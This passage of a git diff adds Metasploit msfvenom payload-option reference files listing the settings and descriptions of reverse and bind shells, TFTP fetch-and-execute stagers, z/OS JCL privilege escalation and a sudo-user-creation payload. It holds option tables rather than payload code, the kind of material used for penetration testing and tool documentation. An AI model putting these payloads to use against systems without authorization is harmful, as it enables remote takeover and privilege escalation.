PrependSetuid false no Prepend a stub that executes 
the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-shell_find_port.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-shell_find_port.txt new file mode 100644 index 0000000..8ab0da0 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-shell_find_port.txt 
@@ -0,0 +1,79 @@ + + Name: TFTP Fetch, Linux Command Shell, Find Port Inline + Module: payload/cmd/linux/tftp/x86/shell_find_port + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Ramon de C Valle + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CPORT 58835 no The local client port +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME WSvIzolyJLk no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. + Spawn a shell on an established connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system 
call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-shell_find_tag.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-shell_find_tag.txt new file mode 100644 index 0000000..e6e0e04 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-shell_find_tag.txt 
@@ -0,0 +1,79 @@ + + Name: TFTP Fetch, Linux Command Shell, Find Tag Inline + Module: payload/cmd/linux/tftp/x86/shell_find_tag + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME KCIFYNOoyJ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. + Spawn a shell on an established connection (proxy/NAT safe) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system 
call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + TAG 0ZdN yes The four byte tag to signify the connection. + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-shell_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-shell_reverse_tcp.txt new file mode 100644 index 0000000..d48cefb --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-shell_reverse_tcp.txt 
@@ -0,0 +1,89 @@ + + Name: TFTP Fetch, Linux Command Shell, Reverse TCP Inline + Module: payload/cmd/linux/tftp/x86/shell_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Ramon de C Valle + joev + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CMD /bin/sh yes The command string to execute +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME ooLfBQckcVFJ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. 
+ Connect back to attacker and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub 
that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x86-shell_reverse_tcp_ipv6.txt b/msfvenom/payload_options/cmd-linux-tftp-x86-shell_reverse_tcp_ipv6.txt new file mode 100644 index 0000000..2800829 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x86-shell_reverse_tcp_ipv6.txt 
@@ -0,0 +1,87 @@ + + Name: TFTP Fetch, Linux Command Shell, Reverse TCP Inline (IPv6) + Module: payload/cmd/linux/tftp/x86/shell_reverse_tcp_ipv6 + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Matteo Malvica + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME kEcVALdVUrO no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from a TFTP server. 
+ Connect back to attacker and spawn a command shell over IPv6 + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no 
Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-mainframe-apf_privesc_jcl.txt b/msfvenom/payload_options/cmd-mainframe-apf_privesc_jcl.txt new file mode 100644 index 0000000..19920c6 --- /dev/null +++ b/msfvenom/payload_options/cmd-mainframe-apf_privesc_jcl.txt 
@@ -0,0 +1,40 @@ + + Name: JCL to Escalate Privileges + Module: payload/cmd/mainframe/apf_privesc_jcl + Platform: Mainframe + Arch: cmd +Needs Admin: No + Total size: 3156 + Rank: Normal + +Provided by: + Bigendian Smalls + Ayoub + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +ACTNUM MSFUSER-ACCTING-INFO yes Accounting info for JCL JOB card +APFLIB SYS1.LINKLIB yes APF Authorized Library to use +JCLASS A yes Job Class for JCL JOB card +MSGCLASS Z yes Message Class for JCL JOB card +MSGLEVEL (0,0) yes Message Level for JCL JOB card +NOTIFY no Notify User for JCL JOB card +PGMNAME programmer name yes Programmer name for JCL JOB card +RPORT 21 yes The target port + +Description: + Elevate privileges for user. Adds + SYSTEM SPECIAL and BPX.SUPERUSER to user profile. Does this by using + an unsecured/updateable APF authorized library (APFLIB) and updating + the user's ACEE using this program/library. Note: This privesc only + works with z/OS systems using RACF, no other ESM is supported. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + JOBNAME DUMMY yes Job name for JCL JOB card + NTFYUSR false yes Include NOTIFY Parm? + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-mainframe-bind_shell_jcl.txt b/msfvenom/payload_options/cmd-mainframe-bind_shell_jcl.txt new file mode 100644 index 0000000..a12f17b --- /dev/null +++ b/msfvenom/payload_options/cmd-mainframe-bind_shell_jcl.txt 
@@ -0,0 +1,43 @@ + + Name: Z/OS (MVS) Command Shell, Bind TCP + Module: payload/cmd/mainframe/bind_shell_jcl + Platform: Mainframe + Arch: cmd +Needs Admin: No + Total size: 10712 + Rank: Normal + +Provided by: + Bigendian Smalls + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +ACTNUM MSFUSER-ACCTING-INFO yes Accounting info for JCL JOB card +JCLASS A yes Job Class for JCL JOB card +LHOST 0.0.0.0 yes The listen address (an interface may be specified) +LPORT 32700 yes The listen port +MSGCLASS Z yes Message Class for JCL JOB card +MSGLEVEL (0,0) yes Message Level for JCL JOB card +NOTIFY no Notify User for JCL JOB card +PGMNAME programmer name yes Programmer name for JCL JOB card +RHOST no The target address + +Description: + Provide JCL which creates a bind shell + This implementation does not include ebcdic character translation, + so a client with translation capabilities is required. MSF handles + this automatically. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + JOBNAME DUMMY yes Job name for JCL JOB card + NTFYUSR false yes Include NOTIFY Parm? + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-mainframe-generic_jcl.txt b/msfvenom/payload_options/cmd-mainframe-generic_jcl.txt new file mode 100644 index 0000000..205f9ba --- /dev/null +++ b/msfvenom/payload_options/cmd-mainframe-generic_jcl.txt 
@@ -0,0 +1,39 @@ + + Name: Generic JCL Test for Mainframe Exploits + Module: payload/cmd/mainframe/generic_jcl + Platform: Mainframe + Arch: cmd +Needs Admin: No + Total size: 150 + Rank: Normal + +Provided by: + Bigendian Smalls + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +ACTNUM MSFUSER-ACCTING-INFO yes Accounting info for JCL JOB card +JCLASS A yes Job Class for JCL JOB card +MSGCLASS Z yes Message Class for JCL JOB card +MSGLEVEL (0,0) yes Message Level for JCL JOB card +NOTIFY no Notify User for JCL JOB card +PGMNAME programmer name yes Programmer name for JCL JOB card + +Description: + Provide JCL which can be used to submit + a job to JES2 on z/OS which will exit and return 0. This + can be used as a template for other JCL based payloads + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + JOBNAME DUMMY yes Job name for JCL JOB card + NTFYUSR false yes Include NOTIFY Parm? + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-mainframe-reverse_shell_jcl.txt b/msfvenom/payload_options/cmd-mainframe-reverse_shell_jcl.txt new file mode 100644 index 0000000..d90afb6 --- /dev/null +++ b/msfvenom/payload_options/cmd-mainframe-reverse_shell_jcl.txt 
@@ -0,0 +1,49 @@ + + Name: Z/OS (MVS) Command Shell, Reverse TCP + Module: payload/cmd/mainframe/reverse_shell_jcl + Platform: Mainframe + Arch: cmd +Needs Admin: No + Total size: 8993 + Rank: Normal + +Provided by: + Bigendian Smalls + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +ACTNUM MSFUSER-ACCTING-INFO yes Accounting info for JCL JOB card +JCLASS A yes Job Class for JCL JOB card +LHOST 0.0.0.0 yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +MSGCLASS Z yes Message Class for JCL JOB card +MSGLEVEL (0,0) yes Message Level for JCL JOB card +NOTIFY no Notify User for JCL JOB card +PGMNAME programmer name yes Programmer name for JCL JOB card + +Description: + Provide JCL which creates a reverse shell + This implementation does not include ebcdic character translation, + so a client with translation capabilities is required. MSF handles + this automatically. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + JOBNAME DUMMY yes Job name for JCL JOB card + NTFYUSR false yes Include NOTIFY Parm? + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-adduser.txt b/msfvenom/payload_options/cmd-unix-adduser.txt new file mode 100644 index 0000000..ec40697 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-adduser.txt 
@@ -0,0 +1,43 @@ + + Name: Add user with useradd + Module: payload/cmd/unix/adduser + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 153 + Rank: Normal + +Provided by: + Nick Cottrell + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +PASS Metasploit$1 yes The password for this user +USER metasploit yes The username to create + +Description: + Creates a new user. By default the new user is set with sudo + but other options exist to make the new user automatically + root but this is not automatically set since the new user will + be treated as root (and login may be difficult). The new user + can also be set as just a standard user if desired. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + RootMethod SUDO no The method to obtain root with the new user (Accepted: SUID, SUDO, NONE) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + + + When RootMethod is SUDO: + + Name Current Setting Required Description + ---- --------------- -------- ----------- + CheckSudoers true no Check if the sudoers file exists before modifying it + diff --git a/msfvenom/payload_options/cmd-unix-bind_awk.txt b/msfvenom/payload_options/cmd-unix-bind_awk.txt new file mode 100644 index 0000000..3548d90 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-bind_awk.txt 
@@ -0,0 +1,32 @@ + + Name: Unix Command Shell, Bind TCP (via AWK) + Module: payload/cmd/unix/bind_awk + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 140 + Rank: Normal + +Provided by: + espreto + Ulisses Castro + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Listen for a connection and spawn a command shell via GNU AWK + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-bind_aws_instance_connect.txt b/msfvenom/payload_options/cmd-unix-bind_aws_instance_connect.txt new file mode 100644 index 0000000..bbc88a9 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-bind_aws_instance_connect.txt 
@@ -0,0 +1,42 @@ + + Name: Unix SSH Shell, Bind Instance Connect (via AWS API) + Module: payload/cmd/unix/bind_aws_instance_connect + Platform: Unix + Arch: x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r, riscv32be, riscv32le, riscv64be, riscv64le, loongarch64 +Needs Admin: No + Total size: 0 + Rank: Normal + +Provided by: + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +ACCESS_KEY_ID no AWS access key +EC2_ID yes The EC2 ID of the instance +INSTANCE_USER no Username on the EC2 instance with which to log-in +PASSWORD no EC2 instance local password to authenticate with +REGION us-east-1 yes AWS region containing the instance +ROLE_ARN no AWS assumed role ARN +ROLE_SID no AWS assumed role session ID +SECRET_ACCESS_KEY no AWS secret key +USERNAME no EC2 instance local username to authenticate with + +Description: + Creates an SSH shell using AWS Instance Connect + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand exit no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + KEY_PASS no Passphrase for SSH private key(s) + PRIVATE_KEY no The string value of the private key that will be used. If you are using MSFConsole, + this value should be set as file:PRIVATE_KEY_PATH. OpenSSH, RSA, DSA, and ECDSA private keys are supported. + SSH_DEBUG false no Enable SSH debugging output (Extreme verbosity!) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 
diff --git a/msfvenom/payload_options/cmd-unix-bind_busybox_telnetd.txt b/msfvenom/payload_options/cmd-unix-bind_busybox_telnetd.txt new file mode 100644 index 0000000..f426b31 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-bind_busybox_telnetd.txt @@ -0,0 +1,33 @@ + + Name: Unix Command Shell, Bind TCP (via BusyBox telnetd) + Module: payload/cmd/unix/bind_busybox_telnetd + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 26 + Rank: Normal + +Provided by: + Matthew Kienow + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LOGIN_CMD /bin/sh yes Command telnetd will execute on connect +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Listen for a connection and spawn a command shell via BusyBox telnetd + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand pkill telnetd yes A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + TelnetdPath telnetd yes The path to the telnetd executable + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-bind_inetd.txt b/msfvenom/payload_options/cmd-unix-bind_inetd.txt new file mode 100644 index 0000000..981bb96 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-bind_inetd.txt 
@@ -0,0 +1,33 @@ + + Name: Unix Command Shell, Bind TCP (inetd) + Module: payload/cmd/unix/bind_inetd + Platform: Unix + Arch: cmd +Needs Admin: Yes + Total size: 487 + Rank: Normal + +Provided by: + hdm + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Listen for a connection and spawn a command shell (persistent) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InetdPath inetd yes The path to the inetd executable + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + ShellPath /bin/sh yes The path to the shell to execute + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-bind_jjs.txt b/msfvenom/payload_options/cmd-unix-bind_jjs.txt new file mode 100644 index 0000000..10ce543 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-bind_jjs.txt 
@@ -0,0 +1,34 @@ + + Name: Unix Command Shell, Bind TCP (via jjs) + Module: payload/cmd/unix/bind_jjs + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 795 + Rank: Normal + +Provided by: + conerpirate + bcoles + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address +SHELL /bin/sh yes The shell to execute + +Description: + Listen for a connection and spawn a command shell via jjs + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + JJSPath jjs yes The path to the JJS executable + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-bind_lua.txt b/msfvenom/payload_options/cmd-unix-bind_lua.txt new file mode 100644 index 0000000..4e207b6 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-bind_lua.txt 
